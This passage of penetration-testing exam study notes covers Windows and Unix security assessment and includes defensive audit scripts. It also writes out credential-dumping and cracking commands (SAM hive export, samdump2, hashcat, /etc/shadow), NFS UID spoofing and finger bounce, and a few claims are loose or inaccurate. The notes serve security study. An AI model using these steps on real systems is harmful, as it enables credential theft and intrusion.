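SAM_SAMPLE = "svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::"  # constructed


def _hexlen(s: str, n: int) -> bool:
    return len(s) == n and bool(HEX.match(s))


def identify(line: str) -> Dict:
    """Classify one line as SAM dump (LM:NT), Net-NTLMv1 or Net-NTLMv2 by field layout."""
    f = line.strip().split(":")
    # pwdump / samdump2 style: user:RID:LM hash(32 hex):NT hash(32 hex):::
    if len(f) >= 4 and f[1].isdigit() and _hexlen(f[2], 32) and _hexlen(f[3], 32):
        return {"format": "SAM dump (LM:NT)", "user": f[0], "rid": int(f[1]),
                "lm": f[2].lower(), "nt": f[3].lower(),
                "lm_disabled": f[2].lower() == EMPTY_LM,
                "empty_password": f[3].lower() == EMPTY_NT,
                "hashcat_modes": [MODES["LM"], MODES["NTLM"]]}
    # Net-NTLMv1 capture: user::domain:LM response(48):NT response(48):server challenge(16)
    if len(f) == 6 and f[1] == "" and _hexlen(f[3], 48) and _hexlen(f[4], 48) and _hexlen(f[5], 16):
        lm_resp = f[3].lower()
        return {"format": "NetNTLMv1", "user": f[0], "domain": f[2],
                "lm_response": lm_resp, "nt_response": f[4].lower(),
                "server_challenge": f[5].lower(),
                # NTLM2 session security: 8-byte client nonce then 16 zero bytes in the LM field
                "ess": lm_resp.endswith("0" * 32),
                "hashcat_modes": [MODES["NetNTLMv1"]]}
    # Net-NTLMv2 capture: user::domain:server challenge(16):NTProofStr(32):blob
    if len(f) == 6 and f[1] == "" and _hexlen(f[3], 16) and _hexlen(f[4], 32) and HEX.match(f[5]):
        return {"format": "NetNTLMv2", "user": f[0], "domain": f[2],
                "server_challenge": f[3].lower(), "ntproofstr": f[4].lower(),
                "blob": f[5].lower(), "hashcat_modes": [MODES["NetNTLMv2"]]}
    raise ValueError("unrecognised hash line")


def audit(lines: List[str]) -> List[str]:
    """Defender's notes: which weak formats are present and what each one implies."""
    notes = []
    for line in lines:
        h = identify(line)
        if h["format"].startswith("SAM"):
            if h["empty_password"]:
                notes.append(f"{h['user']}: empty password")
            state = "disabled" if h["lm_disabled"] else "STORED (14-char, case-insensitive)"
            notes.append(f"{h['user']}: LM hash {state}")
        elif h["format"] == "NetNTLMv1":
            ess = " with NTLM2 session security" if h["ess"] else ""
            notes.append(f"{h['domain']}\\{h['user']}: NetNTLMv1 response captured{ess}; v1 should be disabled")
        else:
            notes.append(f"{h['domain']}\\{h['user']}: NetNTLMv2 response captured; strength rests on the password")
    return notes


if __name__ == "__main__":
    for line in (SAM_SAMPLE, NETNTLMV1_SAMPLE, NETNTLMV2_SAMPLE):
        h = identify(line)
        print(h["format"], h["user"], h["hashcat_modes"])
    print("\n".join(audit([SAM_SAMPLE, NETNTLMV1_SAMPLE, NETNTLMV2_SAMPLE])))
```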

Offline Password Analysis (rainbow tables / hash brute forcing)

Hydra, John the Ripper with wordlists, Rainbowcrack

https://project-rainbowcrack.com/

https://github.com/vanhauser-thc/thc-hydra

https://tools.kali.org/password-attacks/hydra

E5: Windows Vulnerabilities

Requirements:

Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.

Knowledge of local windows privilege escalation vulnerabilities and techniques.

Knowledge of common post exploitation activities:

- obtain password hashes, both from the local SAM and cached credentials
- obtaining locally-stored clear-text passwords
- crack password hashes
- check patch levels
- derive list of missing security patches
- reversion to previous state

Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.

Name / Description / CVE or MS bulletin

EternalBlue: SMB vulnerability. MS17-010

Knowledge of local windows privilege escalation vulnerabilities and techniques.

Name / Description / CVE, MS bulletin or remarks

Pass the hash: reuse of an NTLM hash. Mimikatz.
Silver/Golden Ticket: reuse of an NTLM hash. Mimikatz. Lateral movement.
Cached passwords: -
Session hijacking: -
Token manipulation: -
Unquoted service paths: unquoted service paths are not escaped, and Windows looks for the file name without spaces before it looks for file names with spaces. If a service is called Image Viewer, we might be able to execute a payload named "Image": Windows will try to run Image first, before considering other file names with spaces.
DLL hijacking: if we have write permissions to a binary dependency folder used by a service, we can overwrite the DLL with a reverse shell payload or other payloads.
Registry modifications: e.g. if a service executes a binary whose location is stored in a registry value we can change, we can achieve code execution if the service runs with elevated privileges.
Autorun: -
Bad write permissions: -

Knowledge of common post exploitation activities:

• obtain password hashes, both from the local SAM and cached credentials

• obtaining locally-stored clear-text passwords

• crack password hashes

• check patch levels

• derive list of missing security patches

• reversion to previous state

SAM credential dump

SAM = Security Accounts Manager.
On the Windows victim machine:

reg save hklm\system system
reg save hklm\sam sam

On the attacker's Kali machine:

samdump2 system sam

Hash Cracking

We can use John the Ripper or hashcat.
hash.txt holds the extracted hashes.

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

Check patch levels

wmic qfe get Caption,Description,HotFixID,InstalledOn

derive list of missing security patches

We can use vulnerability scanners such as Nessus or Windows Exploit Suggester.
https://msrc.microsoft.com/update-guide

Workflow: check the installed patches with wmic, note when the latest patch was installed, and compare that date against the Windows update release dates.
The date helps narrow down which exploits we can use: any exploit created after the patch date is more likely to work.

Reversion to previous state

https://www.lifewire.com/how-to-start-system-restore-from-the-command-prompt-2624522

If system restore data is available, we can try it.

rstrui.exe

This attack vector is rarely seen, but good to know.

E6: Windows Patch Management Strategies

Knowledge of common windows patch management strategies:

- SMS
- SUS
- WSUS
- MBSA

Microsoft Systems Management Server (SMS)

https://en.wikipedia.org/wiki/Microsoft_System_Center_Configuration_Manager

Microsoft Endpoint Configuration Manager (Configuration Manager, also known as ConfigMgr or MECM), formerly System Center Configuration Manager (SCCM) and Systems Management Server (SMS) is a systems management software product developed by Microsoft for managing large groups of computers running Windows NT, Windows Embedded, macOS (OS X), Linux or UNIX, as well as Windows Phone, Symbian, iOS and Android mobile operating systems. Configuration Manager provides remote control, patch management, software distribution, operating system deployment, network access protection and hardware and software inventory.

  • Systems Management Server 1.0, released in 1994, last release in 2003.
  • System Center Configuration Manager 2007, last release 2019
  • Endpoint Configuration Manager released 2019, last released August 2021

Author's Notes: CREST's CPSA Technical syllabus document does not specify

Key functionalities of Microsoft Systems Management Server 2003 include the following:

Enterprise application deployment. From mobile devices to datacenter servers, Systems Management Server 2003 delivers comprehensive client and server application deployment using Active Directory and inventory-based targeting. With its new Web services-based agent, Systems Management Server 2003 extends unified management beyond the corporate network to the growing mobile work force.

Securing the enterprise. The inclusion of vulnerability assessment reporting and integrated patch deployment features enables customers to constantly monitor security patch status across their corporations and provide rapid, accurate delivery of updates.

Managing computer assets. With integrated inventory and application-use monitoring, Systems Management Server 2003 helps companies keep track of corporate IT assets, improve help desk efficiency and identify application usage in the enterprise.

Source: https://news.microsoft.com/2003/10/22/microsoft-systems-management-server-2003-is-released-to-manufacturing/

Microsoft Software Update Services (SUS)

What is Microsoft Software Update Services (SUS)?

Microsoft SUS is a free patch management tool provided by Microsoft to help network administrators deploy security patches more easily. In simple terms, Microsoft SUS is a version of Windows Update that you can run on your network.

Instead of each workstation having to connect to the Internet to update Windows, each workstation connects to the Microsoft SUS Server instead and updates from there. Microsoft SUS Server alone requires access to the public Internet as it connects to Windows Update.

The server features include:

Built-in security. The administrative pages are restricted to local administrators on the computer that hosts the updates. The synchronization validates the digital certificates on any downloads to the update server. If the certificates are not from Microsoft, the packages are deleted.

Selective content approval. Updates synchronized to your server running Software Update Services are not made automatically available to the computers that have been configured to get updates from that server. The administrator approves the updates before they are made available for download. This allows the administrator to test the packages before deploying them.

Content synchronization. The server is synchronized with the public Windows Update service either manually or automatically. The administrator can set a schedule or have the synchronization component of the server do it automatically at preset times. Alternatively, the administrator can use the Synchronize Now button to manually synchronize.

Server-to-server synchronization. Because you may need multiple servers running Microsoft SUS inside your corporation in order to bring the updates closer to your desktops and servers for downloading, Microsoft SUS will allow you to point to another server running Microsoft SUS instead of Windows Update, allowing these critical software updates to be distributed around your enterprise.

Update package hosting flexibility. Administrators have the flexibility of downloading the actual updates to their intranet, or pointing computers to a worldwide network of download servers maintained by Microsoft. Downloading updates might appeal to an administrator with a network closed to the Internet. Large networks spread over geographically disparate sites might find it more beneficial to use the Microsoft maintained download servers. These are the actual Windows Update download servers. In a scenario like this, an administrator would download and test updates at a central site, then point computers requiring updates to one of the Windows Update download servers. Microsoft maintains a worldwide network of these type servers.

Multi-language support. Although the Software Update Services administrative interface is available only in English or Japanese, the server supports the publishing of updates to multiple operating-system language versions. Administrators can configure the list of languages for which they want updates downloaded.

Remote administration via HTTP or HTTPS. The administrative interface is Web-based and therefore allows for remote (internal) administration using Internet Explorer 5.5 or higher.

Update status logging. You can specify the address of a Web server where the Automatic Updates client should send statistics about updates that have been downloaded, and whether the updates have been installed. These statistics are sent using the HTTP protocol and appear in the log file of the Web server.

Source: Daniel Petri, Jan 08, 2009, What is Microsoft Software Update Services (SUS)?, https://www.petri.com/sus

SUS only delivered hotfixes and patches for Microsoft operating systems. SUS ran on a Windows Server operating system and downloaded updates for the specified versions of Windows from the remote Windows Update site which is operated by Microsoft. Clients could then download updates from this internal server, rather than connecting directly to Windows Update. Support for SUS by Microsoft was originally planned to end on 6 December 2006, but based on user feedback, the date was extended to 10 July 2007.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

SUS does not update service packs, applications, etc.

Windows Server Update Services (WSUS)

Windows Server Update Services (WSUS), previously known as Software Update Services (SUS), is a computer program and network service developed by Microsoft Corporation that enables administrators to manage the distribution of updates and hotfixes released for Microsoft products to computers in a corporate environment. WSUS downloads these updates from the Microsoft Update website and then distributes them to computers on a network. WSUS is an integral component of Windows Server.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

WSUS Operations

Windows Server Update Services 2.0 and above operate on a repository of update packages from Microsoft. It allows administrators to approve or decline updates before release, to force updates to install by a given date, and to produce extensive reports on which updates each machine requires. System administrators can also configure WSUS to approve certain classes of updates automatically (critical updates, security updates, service packs, drivers, etc.). One can also approve updates for detection only, allowing an administrator to see which machines will require a given update without also installing that update.

WSUS may be used to update computers on a disconnected network. This requires exporting patch data from a WSUS server connected to the internet and, using removable media, importing to a WSUS server set up on the disconnected network.

Administrators can use WSUS with Group Policy for client-side configuration of the Automatic Updates client, ensuring that end-users can't disable or circumvent corporate update policies. WSUS does not require the use of Active Directory; client configuration can also be applied by Local Group Policy or by modifying the Windows registry.

WSUS uses .NET Framework, Microsoft Management Console and Internet Information Services. WSUS 3.0 uses either SQL Server Express or Windows Internal Database as its database engine, whereas WSUS 2.0 uses WMSDE. System Center Configuration Manager (SCCM) interoperates with WSUS and can import third party security updates into the product.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

Latest release in 2019, for Windows Server 2019.

Microsoft Baseline Security Analyzer (MBSA)

Microsoft Baseline Security Analyzer (MBSA) is a discontinued software tool, no longer available from Microsoft, that determines security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer and the IIS web server, products such as Microsoft SQL Server, and Microsoft Office macro settings. Security updates are determined by the current version of MBSA using the Windows Update Agent present on Windows computers since Windows 2000 Service Pack 3. The less-secure settings, often called Vulnerability Assessment (VA) checks, are assessed based on a hard-coded set of registry and file checks. An example of a VA might be that permissions for one of the directories in the /www/root folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.

In November 2013 MBSA 2.3 was released. This release adds support for Windows 8, Windows 8.1, Windows Server 2012, and Windows Server 2012 R2.

MBSA only scans for 3 classes of updates: security updates, service packs and update rollups. Critical and optional updates are left aside.

Source: https://en.wikipedia.org/wiki/Microsoft_Baseline_Security_Analyzer

E7: Desktop Lockdown breakout

Knowledge and understanding of techniques to break out of a locked down Windows desktop / Citrix environment.
Privilege escalation techniques.

See E5.

E8: Exchange

Knowledge of common attack vectors for Microsoft Exchange Server.
https://en.wikipedia.org/wiki/Microsoft_Exchange_Server

MS Exchange server is a mail exchange server.

Weak to wordlist credential attacks (credential stuffing).

Attacks may come from other services in the ASP.NET web framework.

E9: Common Windows Applications

Knowledge of significant vulnerabilities in common windows applications for which there is public exploit code available.

Some common Windows application vulnerabilities:
- EternalBlue for SMB
- NetBIOS information leakage.
- SMB leakage.
- RDP attacks.

Anything with anonymous login.

F: Unix Security Assessment

Introduction

UNIX is a family of operating systems with a long history.
https://en.wikipedia.org/wiki/Unix#Free_Unix_and_Unix-like_variants

A quick look at modern UNIX OS
- Oracle Solaris Operating System.
- Darwin Operating System.
- IBM AIX Operating System.
- HP-UX Operating System.
- FreeBSD Operating System.
- NetBSD Operating System.
- Microsoft's SCO XENIX Operating System.
- SGI IRIX Operating System.

Oracle Solaris

F1: User Enumeration

Requirements:

Discovery of valid usernames from network services commonly running by default:
- rusers
- rwho
- SMTP
- finger
Understand how finger daemon derives the information that it returns, and hence how it can be abused.

rusers

Check who is logged in on remote machines
https://www.unix.com/man-page/linux/1/rusers/

rusersd needs to be installed on the remote machine. It is like a listener/server.

rusers -al <target_ip>

It may show usernames and IP addresses.

rwho

Check who is logged in to our current local machine.
who feels more reliable. SSH connection will be "pts". "TTY" connections are local physical users.

Simple Mail Transfer Protocol (SMTP)

Hosts need SMTPd running.

Banner Grabbing

nc -vn <target_ip> 25

Finding Information

HELO             # or HELO x
VRFY root        # will check if this user in system or not.
EXPN root        # will check user and may reveal email address

Auto enumeration
nmap --script smtp-enum-users <target_ip>

Finger

Service which returns user details like full name, emails, etc.
Host needs the fingerd running.
https://en.wikipedia.org/wiki/Finger_protocol

The program would supply information such as whether a user is currently logged-on, e-mail address, full name etc. As well as standard user information, finger displays the contents of the .project and .plan files in the user's home directory.

Banner Grabbing

nc -vn <target_ip> 79

Listing users

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Finger bounce

finger user@host@victim
finger @internal@external

Source: https://book.hacktricks.xyz/pentesting/pentesting-finger

F2: Unix Vulnerabilities

Recent or commonly-found Solaris vulnerabilities, and in particular those for which there is exploit code in the public domain.

Recent or commonly-found Linux vulnerabilities, and in particular those for which there is exploit code in the public domain.

Use of remote exploit code and local exploit code to gain root access to target host

Common post-exploitation activities:

- exfiltrate password hashes
- crack password hashes
- check patch levels
- derive list of missing security patches
- reversion to previous state

Solaris Vulnerabilities

Author's Notes: Couldn't find any that is generic enough to put in here... :(

Linux Vulnerabilities

  • Dirty Cow kernel exploit

Generally, if the kernel version is 3+, it is definitely vulnerable to some kernel exploits

Exfiltrate password hashes & crack

Linux password files.

/etc/passwd
/etc/shadow

Once we have these 2 files, it may be possible to run wordlist attacks or brute force against the hashes.

Check patch levels

uname -a

Derive list of missing security patches

Author's Notes: Each flavour or distribution has its own package manager. Each handles updating differently.

For example, Debian or Ubuntu with APT package manager:

| APT command | Description |
| --- | --- |
| apt list --upgradable | List all updates available |
| apt list --upgradable \| grep "-security" | List all updates that are security updates |

Taken from: learnsomemore, https://askubuntu.com/questions/774805/how-to-get-a-list-of-all-pending-security-updates
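As an added example (not from the notes or from askubuntu), here is how the "-security" filter above can be done in a script, by parsing the line shape that `apt list --upgradable` prints on Ubuntu. The sample output is constructed; package names and versions are made up.

```python
"""Added example: parse `apt list --upgradable` output and keep the
packages whose pending update is published in a -security suite."""

import re

# Constructed sample output in the shape `apt list --upgradable` prints
# on Ubuntu (name/suite,suite version arch [upgradable from: old]).
SAMPLE_APT_OUTPUT = """\
Listing... Done
openssl/focal-updates,focal-security 1.1.1f-1ubuntu2.16 amd64 [upgradable from: 1.1.1f-1ubuntu2.15]
curl/focal-security 7.68.0-1ubuntu2.14 amd64 [upgradable from: 7.68.0-1ubuntu2.12]
vim/focal-updates 2:8.1.2269-1ubuntu5.9 amd64 [upgradable from: 2:8.1.2269-1ubuntu5.7]
"""

LINE_RE = re.compile(
    r"^(?P<name>\S+?)/(?P<suites>\S+)\s+(?P<new>\S+)\s+(?P<arch>\S+)"
    r"\s+\[upgradable from: (?P<old>[^\]]+)\]$"
)


def parse_upgradable(text):
    """One dict per package line; the 'Listing... Done' banner and any
    line that does not match the shape is skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            # a package can come from several suites, comma separated
            row["suites"] = row["suites"].split(",")
            rows.append(row)
    return rows


def security_updates(text):
    """Packages whose update comes from any suite ending in -security.
    This is the missing-security-patch list the checklist asks for."""
    return [r for r in parse_upgradable(text)
            if any(s.endswith("-security") for s in r["suites"])]


if __name__ == "__main__":
    for r in security_updates(SAMPLE_APT_OUTPUT):
        print(f"{r['name']}: {r['old']} -> {r['new']} ({','.join(r['suites'])})")
```

Note that the suite list is comma separated, so a grep for "-security" still catches a package such as openssl above whose security suite is listed second.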

reversion to previous state

Solaris reverting snapshots
https://docs.oracle.com/cd/E36784_01/html/E36820/revertsnap.html
- svcadm restart manifest-import
- svcadm refresh
- svccfg refresh

Linux does not have a default "System Restore" function. There are packages that can help with this.

F3: File Transfer Protocol(FTP)

FTP access control
Anonymous access to FTP servers
Risks of allowing write access to anonymous users.

FTP Bounce Attack

FTP bounce attack is an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine, which serves as a proxy for the request, similar to an Open mail relay using SMTP.

This technique can be used to port scan hosts discreetly, and to potentially bypass a network Access-control list to access specific ports that the attacker cannot access through a direct connection, for example with the nmap port scanner.

Nearly all modern FTP server programs are configured by default to refuse PORT commands that would connect to any host but the originating host, thwarting FTP bounce attacks.

Source: https://en.wikipedia.org/wiki/FTP_bounce_attack

FTP Access Control

Uses username and password.
It is possible to create an FTP-specific user and deny other users from logging in. We can also set a home folder for FTP, so that users cannot browse the whole system's files.

https://linuxroutes.com/create-ftp-user-with-specific-directory-access/

Importantly, we need to disable shell access for the FTP user.

usermod -s /sbin/nologin ftpuser

Even if the ftpuser password is leaked, attackers cannot SSH in through the ftpuser.

Anonymous access to FTP servers

Login:

ftp <target_ip>
pftp <target_ip>   # this is in passive mode

Credentials:

Username: anonymous

Password: anonymous

Risks of allowing write access to anonymous users.

If the directory is linked to a php website, we can upload a php file and achieve code execution.

It depends on what the FTP server is used for; it is up to you to figure out an attack vector based on file upload through the FTP service.

FTP commands:

get filename.txt

put filename.txt

If we fail to put a file, that means we do not have write access. It may be worth it to check if we can write to other directories.

F4: Sendmail/ SMTP

Valid username discovery via EXPN and VRFY
Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible
Mail relaying

Hosts need SMTPd running.

Banner Grabbing

nc -vn <target_ip> 25

Finding Information

HELO             # or HELO x
VRFY root        # will check if this user in system or not.
EXPN root        # will check user and may reveal email address

Auto enumeration

nmap --script smtp-enum-users <target_ip>
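The VRFY/EXPN exchange used in F1 and again here in F4 boils down to the server's reply codes. The following is an added example, not from the notes and not any real MTA's code: a tiny model of an SMTP server that answers VRFY and EXPN either truthfully (the leaky configuration) or with the non-disclosing replies, plus the client-side interpretation that tools like smtp-enum-users rely on. The user and alias tables are constructed sample data.

```python
"""Added example: model of SMTP VRFY/EXPN handling, leaky versus
hardened, and what a client learns from each reply code."""

# Constructed sample accounts; none of these are real.
LOCAL_USERS = {"root", "alice", "postmaster"}
ALIASES = {"staff": ["alice@example.test", "bob@example.test"]}


def handle_command(line, disclose):
    """Reply to one command line as the server would.

    disclose=True  : answer VRFY/EXPN truthfully (250 / 550), which is
                     what lets a client confirm or rule out usernames.
    disclose=False : hardened behaviour; VRFY always gets 252 and EXPN is
                     refused, so every probe looks identical whether or
                     not the name exists.
    """
    parts = line.strip().split(None, 1)
    if not parts:
        return "500 5.5.2 Error: bad syntax"
    verb = parts[0].upper()
    arg = parts[1].strip() if len(parts) > 1 else ""

    if verb == "HELO":
        return "250 mail.example.test"
    if verb == "VRFY":
        if not disclose:
            return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
        if arg in LOCAL_USERS:
            return f"250 2.1.5 {arg} <{arg}@example.test>"
        return f"550 5.1.1 {arg}... User unknown"
    if verb == "EXPN":
        if not disclose:
            return "502 5.5.1 EXPN not implemented"
        members = ALIASES.get(arg)
        if not members:
            return f"550 5.1.1 {arg}... User unknown"
        # multi-line reply: continuation lines use "250-", the last "250 "
        lines = [f"250-{m}" for m in members[:-1]] + [f"250 {members[-1]}"]
        return "\r\n".join(lines)
    return "502 5.5.1 Command not implemented"


def user_exists_from_reply(reply):
    """What a client learns: True/False when the server confirms or denies
    the name, None when the reply discloses nothing."""
    code = reply[:3]
    if code == "250":
        return True
    if code == "550":
        return False
    return None


def probe(names, disclose):
    """Run VRFY for each name and collect what the replies reveal."""
    return {n: user_exists_from_reply(handle_command(f"VRFY {n}", disclose))
            for n in names}


if __name__ == "__main__":
    print("leaky   :", probe(["root", "ghost"], disclose=True))
    print("hardened:", probe(["root", "ghost"], disclose=False))
```

With disclose=False every name gets the same 252, so the enumeration script learns nothing. On real servers this is `disable_vrfy_command = yes` in Postfix and `O PrivacyOptions=goaway` (or `novrfy,noexpn`) in sendmail; a burst of VRFY/EXPN commands in the mail log is also a useful detection signal for this kind of enumeration.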

Recent vulnerabilities

Mail Relaying

Often used in the cloud to help businesses send mass emails, overcoming SMTP limits set by providers etc.
https://blog.mailchannels.com/what-is-an-smtp-relay-service

F5: Network File System(NFS)

NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).

Root squashing, nosuid and noexec options.

File access through UID and GID manipulation.

NFS is used for file sharing in a network. Generally, we can mount a remote folder onto our local machine and use it as shared storage.

Enumerating shares

showmount -e <target_ip>

Mounting onto our local machine

https://linuxize.com/post/how-to-mount-an-nfs-share-in-linux/

sudo mount -t nfs target_ip:/home/myuser/backups /var/backups -o nolock

Unmounting the share

umount 10.10.0.10:/home/myuser/backups
OR
umount /var/backups

Here, we are mounting the remote user's backup folder onto our local machine's /var/backups folder.

Automatic mounting can be done with /etc/fstab

NFS security by GID, UID

GID and UID are group ID and user ID. The id command shows the current user's IDs.

id

On the NFS server machine, some files may be restricted to certain UID or GIDs.

Launching attack

CASE: A file has the following read permissions:
UID=1103

When we mount it, we need similar permissions to access it.
We can add a new user into our attacker machine with the UID of 1103


Add a user.

sudo useradd -u 1103 tempuser

Change the user's password

sudo passwd tempuser

Change user of the terminal to tempuser

su tempuser

Try and access the file.


If a file needs root, we can change to our own root user to access it.
The same process goes for GID.

Root Squashing

Root squash is a special mapping of the remote superuser (root) identity when using identity authentication (local user is the same as remote user). Under root squash, a client's uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

Root squash is a technique to avoid privilege escalation on the client machine via suid (setuid) executables. Without root squash, an attacker can generate suid binaries on the server that are executed as root on other clients, even if the client user does not have superuser privileges. Hence it protects client machines against other malicious clients. It does not protect clients against a malicious server (where root can generate suid binaries), nor does it protect the files of any user other than root (as malicious clients can impersonate any user).

Source: https://en.wikipedia.org/wiki/Unix_security#Root_squash
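The host-level, root-squash and nosuid/noexec points above can be checked mechanically. The following is an added example, not from the notes and not part of any NFS implementation: it parses an /etc/exports file, flags exports open to any host or with no_root_squash, and reports which client-side hardening mount options are missing. The exports content is constructed, and the nosuid/noexec/nodev baseline is an assumption of this example, not something NFS enforces.

```python
"""Added example: audit /etc/exports for host-level and root-squash
weaknesses, and check client mount options for nosuid/noexec/nodev."""

import re

# Mount options a client should use for a share it does not fully trust.
# Assumption: this baseline is the example's, not an NFS requirement.
CLIENT_HARDENING = {"nosuid", "noexec", "nodev"}

# Constructed sample /etc/exports; paths and networks are made up.
SAMPLE_EXPORTS = """\
# backups: restricted to one subnet, root_squash is the default
/srv/backups   10.10.0.0/24(rw,sync,no_subtree_check)
/srv/public    *(ro,sync)
/srv/scratch   10.10.0.5(rw,no_root_squash)
/srv/oops      (rw)
"""

# host part, then an optional (option,option,...) group
SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, host, option set) for every client spec in the file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # a path with no client spec at all is exported to everyone
        path, specs = fields[0], (fields[1:] or ["*"])
        for spec in specs:
            m = SPEC_RE.match(spec)
            if not m:
                raise ValueError(f"unparseable client spec: {spec!r}")
            host, opts = m.groups()
            # "(rw)" with a space before it is the classic exports(5)
            # mistake: the host part is empty, so it means any host
            host = host or "*"
            entries.append((path, host, set(filter(None, (opts or "").split(",")))))
    return entries


def audit_exports(text):
    """List (path, host, problem) tuples for weak export entries."""
    findings = []
    for path, host, opts in parse_exports(text):
        wildcard = "*" in host or "?" in host
        if wildcard:
            findings.append((path, host, "not restricted to named hosts or networks"))
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: client root keeps uid 0 on the server"))
        if "insecure" in opts:
            findings.append((path, host, "insecure: requests from unprivileged ports accepted"))
        if "rw" in opts and wildcard:
            findings.append((path, host, "writable by any host"))
    return findings


def missing_client_hardening(mount_options):
    """Given a client mount option string such as 'rw,nolock', return the
    hardening options that are absent (sorted for stable output)."""
    present = set(mount_options.split(","))
    return sorted(CLIENT_HARDENING - present)


if __name__ == "__main__":
    for path, host, problem in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {host}: {problem}")
    print("client side missing:", missing_client_hardening("rw,nolock"))
```

The /srv/oops line shows why the parser treats an empty host as "*": a single space between the path and the option group is enough to export the share read-write to everyone.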

F6: Berkeley R* Service (Berkeley r-commands)

https://en.wikipedia.org/wiki/Berkeley_r-commands

Berkeley r* service:
- access control (/etc/hosts.equiv and .rhosts)
- trust relationships
Impact of poorly-configured trust relationships.

Berkeley r-commands is a suite of programs created in 1981 for sending remote commands from one Unix computer to another.
It is not in use today; however, we may still see some of its services, such as rlogin, running in CTFs or labs.

Commands
- rlogin - remote login
- rsh - remote shell. This is a server, does not require login.
- rexec - remote execute. This is a server, requires login.
- rcp - remote copy
- rwho - remote who
- rstat - rstat returns performance statistics from the kernel.
- ruptime - shows how long it has been since the last restart. If there is no response, the computer is marked as down.

Those r-commands which involve user authentication (rcp, rexec, rlogin, and rsh) share several serious security vulnerabilities:

  • All information, including passwords, is transmitted unencrypted (making it vulnerable to interception).
  • The .rlogin (or .rhosts) file is easy to misuse. They are designed to allow logins without a password, but their reliance on remote usernames, hostnames, and IP addresses is exploitable. For this reason many corporate system administrators prohibit .rhosts files, and actively scrutinize their networks for offenders.
  • The protocol partly relies on the remote party's rlogin client to provide information honestly, including source port and source host name. A corrupt client is thus able to forge this and gain access, as the rlogin protocol has no means of authenticating other machines' identities, or ensuring that the requesting client on a trusted machine is the real rlogin client.
  • The common practice of mounting users' home directories via NFS exposes rlogin to attack by means of fake .rhosts files - this means that any of NFS's security faults automatically plague rlogin.

Due to these problems, the r-commands fell into relative disuse (with many Unix and Linux distributions no longer including them by default). Many networks that formerly relied on rlogin and telnet have replaced them with SSH and its rlogin-equivalent slogin.
Source: https://en.wikipedia.org/wiki/Berkeley_r-commands#Security
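The trust files named above (/etc/hosts.equiv and per-user .rhosts) are where the poorly-configured trust relationships live. As an added example, not from the notes and not from any rlogind implementation, the following parses those files and flags the wildcard entries that turn a trust relationship into an open door, with a small ownership/permission sanity check. The file content is constructed, and the permission rule mirrors the common rlogind/pam_rhosts practice rather than any one implementation (an assumption of this example).

```python
"""Added example: audit hosts.equiv / .rhosts trust files for wildcard
entries and unsafe file ownership or permissions."""

import stat

# Constructed sample .rhosts content; hostnames are made up.
SAMPLE_RHOSTS = """\
# allow alice from the admin box
admin.example.test alice
+ +
+@netops
-rogue.example.test
build.example.test
"""


def parse_rhosts(text):
    """Return (host, user, negated) tuples. Format: one host per line
    (optionally prefixed by - to deny, or +@netgroup), optional user."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        negated = host.startswith("-")
        if negated:
            host = host[1:]
        entries.append((host, user, negated))
    return entries


def audit_rhosts(text, filename=".rhosts"):
    """List (file, entry, problem) for entries that trust too broadly."""
    findings = []
    for host, user, negated in parse_rhosts(text):
        entry = f"{host} {user}".strip() if user else host
        if negated:
            continue  # explicit deny lines are fine
        if host == "+" and user == "+":
            findings.append((filename, entry, "any user from any host is trusted"))
        elif host == "+":
            findings.append((filename, entry, "any host is trusted"))
        elif user == "+":
            findings.append((filename, entry, f"every user on {host} is trusted"))
        elif host.startswith("+@") or host.startswith("@"):
            findings.append((filename, entry, "trust is as broad as the netgroup membership"))
    return findings


def rhosts_permissions_ok(mode, owner_uid, user_uid):
    """Sanity check: the file must belong to the user (or root) and must
    not be writable by group or others, otherwise anyone who can write
    it, e.g. through a writable NFS home, can grant themselves access."""
    if owner_uid not in (user_uid, 0):
        return False
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for f, entry, problem in audit_rhosts(SAMPLE_RHOSTS):
        print(f"{f}: '{entry}': {problem}")
```

The "+ +" line is the one to look for first; it is the configuration that lets any user on any host log in as the file's owner without a password.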

F7: X11 - X Window system common in Unix-like OSes

X Windows security and configuration; host-based vs. user-based access control. (NOT MICROSOFT WINDOWS)
https://www.x.org/wiki/
https://en.wikipedia.org/wiki/X_Window_authorization
Manual page: https://www.x.org/archive/current/doc/man/man1/Xserver.1.xhtml

It is a GUI system.

User-based access control.

$ xhost +SI:localuser:anotheruser
localuser:anotheruser being added to access control list

Check for successful addition with

xhost

For remote users, we may need something like the SUN-DES-1 or MIT-KERBEROS-5 identity management systems.

Host-based

https://www.ibm.com/docs/en/aix/7.1?topic=concerns-enabling-disabling-access-control

xhost + hostname

Hostname is taken from /etc/hosts

Fatal mistake

xhost +

Without a host name, this will allow all hosts. If the server is open to internet, then it is of course extremely vulnerable.

F8: Remote Procedure Call(RPC) Services

https://en.wikipedia.org/wiki/Remote_procedure_call
RPC service enumeration
Common RPC services
Recent or commonly-found RPC service vulnerabilities.

